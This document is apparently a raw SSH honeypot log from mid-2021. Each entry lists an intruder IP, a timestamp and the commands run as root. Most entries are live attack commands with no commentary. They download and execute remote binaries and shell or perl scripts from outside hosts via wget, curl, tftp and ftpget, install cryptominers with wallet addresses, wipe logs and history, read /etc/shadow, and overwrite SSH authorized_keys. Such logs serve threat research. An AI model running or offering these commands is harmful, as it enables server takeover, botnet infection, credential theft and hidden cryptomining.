Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://136.144.41.168/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://136.144.41.168/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
cat db0fa4b8db0333367e9bda3ab68b8042.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 204.48.26.71 26-Jun-2021 03:20:56 ssh2 root
Exec (cd /tmp; wget -qO - narcio.com/ssh|perl; curl -s narcio.com/ssh|perl > /dev/null)
(cd /tmp
wget -qO - narcio.com/ssh|perl
curl -s narcio.com/ssh|perl > /dev/null)

From 61.91.127.36 26-Jun-2021 10:19:42 ssh2 root
Exec echo 'root:1qaz@QWE'>/tmp/up.txt
echo 'root:1qaz@QWE'>/tmp/up.txt

From 209.145.54.176 26-Jun-2021 20:32:12 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
w
uname -a
cat /proc/cpuinfo
ifconfig
ps -x

From 141.98.81.154 26-Jun-2021 20:32:59 ssh2 root
apt install wget
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
sudo apt-get install python-pip
sudo apt-get install python3-pip
yum install python-pip
yum install python3-pip
apt-get install python-pip
apt-get install python3-pip
pip install speedtest-cli
apt
wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py
wget NasaPaul.com/info
chmod +x *
./info
ls -a
apt install python-paramiko
apt install python-colorama

From 134.209.249.145 27-Jun-2021 18:13:01 ssh2 root
Exec id;nproc
id
nproc

From 109.104.151.106 28-Jun-2021 13:36:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://betaalverzoek.ir/bins/bin.x86; curl -O http://betaalverzoek.ir/bins/bin.x86;chmod +x *;./bin.x86 Roots; bin.x86 Roots
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://betaalverzoek.ir/bins/bin.x86
curl -O http://betaalverzoek.ir/bins/bin.x86
chmod +x *
./bin.x86 Roots
bin.x86 Roots

From 209.141.43.233 29-Jun-2021 12:52:19 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://45.10.24.31/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://45.10.24.31/x86_64
chmod 777 *
./x86_64 x86xhed

From 222.102.232.146 29-Jun-2021 15:23:29 ssh2 root
Exec uname -a;cd /tmp;wget radiodeea.hi2.ro/max.txt;perl max.txt;rm -rf max.txt;history -c;clear
uname -a
cd /tmp
wget radiodeea.hi2.ro/max.txt
perl max.txt
rm -rf max.txt
history -c
clear

From 109.104.151.109 30-Jun-2021 01:25:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://apponline957.ir/vdht.sh; curl -O https://apponline957.ir/vdht.sh; chmod 777 vdht.sh; sh vdht.sh; rm -rf vdht.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://apponline957.ir/vdht.sh
curl -O https://apponline957.ir/vdht.sh
chmod 777 vdht.sh
sh vdht.sh
rm -rf vdht.sh

From 209.141.35.200 1-Jul-2021 07:39:47 ssh2 root
Exec cat /etc/issue;  curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49bGaMpdZtB5MqnyAwMk5u9bv3zjpyTE2RnQz2djYCm1goxkSkPuodnW8ayyjNLfLAA72Qm29uJT4RbxCAzbkVH6PxPAZZa
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49bGaMpdZtB5MqnyAwMk5u9bv3zjpyTE2RnQz2djYCm1goxkSkPuodnW8ayyjNLfLAA72Qm29uJT4RbxCAzbkVH6PxPAZZa

From 45.133.1.92 2-Jul-2021 07:23:44 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://2.56.59.211/bins/sora.x86; cat sora.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://2.56.59.211/bins/sora.x86
cat sora.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 106.12.96.112 2-Jul-2021 23:05:35 ssh2 root
Exec echo -n zdpvadhx|md5sum;uname -a
echo -n zdpvadhx|md5sum
uname -a

From 209.141.47.144 4-Jul-2021 01:06:25 ssh2 root
Exec cat /etc/issue;  curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 205.185.127.240 4-Jul-2021 04:26:11 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 129.226.179.211 4-Jul-2021 05:07:37 ssh2 root
Exec echo -n x1u6jl6q|md5sum;uname -a
echo -n x1u6jl6q|md5sum
uname -a

From 209.141.53.60 4-Jul-2021 06:03:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.53.60 4-Jul-2021 06:12:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.43.233 4-Jul-2021 12:33:11 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://45.10.24.31/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://45.10.24.31/x86_64
chmod 777 *
./x86_64 x86xhed

From 5.35.253.22 4-Jul-2021 15:18:20 ssh2 root
w
cd /var/opt
wget bagabel.pro/x/drona.jpg
wget http://bagabel.pro/x/drona.jpg
wget -c
curl -O http://bagabel.pro/x/drona.jpg

From 209.141.53.60 4-Jul-2021 15:20:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
ftp
wget -c http://bagabel.pro/x/bnc.jpg
uname -a
cat /etc/issue
ifconfig
apt-get update

From 209.141.53.60 4-Jul-2021 15:23:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
passwd

From 153.156.45.20 4-Jul-2021 16:06:15 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu

From 45.64.130.147 5-Jul-2021 10:20:02 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o

From 205.185.119.224 5-Jul-2021 15:44:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 3.6.111.41 5-Jul-2021 22:11:30 ssh2 root
Exec echo -n zxvjixwm|md5sum;uname -a
echo -n zxvjixwm|md5sum
uname -a

From 209.141.32.204 5-Jul-2021 22:20:30 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.32.204 5-Jul-2021 22:46:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 01:47:57 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane 1

From 209.141.53.60 6-Jul-2021 14:08:42 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://159.65.51.27/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 159.65.51.27 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 159.65.51.27; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://159.65.51.27/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 159.65.51.27 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 159.65.51.27
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.53.60 6-Jul-2021 15:48:13 ssh2 root
Exec uname -a || echo -
uname -a || echo -
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.32.204 6-Jul-2021 16:02:07 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 17:48:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.62.137/8UsA.sh; curl -O http://198.98.62.137/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 198.98.62.137 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 198.98.62.137; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.98.62.137/8UsA.sh
curl -O http://198.98.62.137/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 198.98.62.137 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 198.98.62.137
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 18:47:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.62.137/8UsA.sh; curl -O http://198.98.62.137/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 198.98.62.137 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 198.98.62.137; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.98.62.137/8UsA.sh
curl -O http://198.98.62.137/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 198.98.62.137 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 198.98.62.137
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 6-Jul-2021 18:52:20 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://159.65.51.27/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 159.65.51.27 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 159.65.51.27; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://159.65.51.27/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 159.65.51.27 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 159.65.51.27
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 7-Jul-2021 01:30:47 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 7-Jul-2021 02:20:32 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.32.204 7-Jul-2021 11:34:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
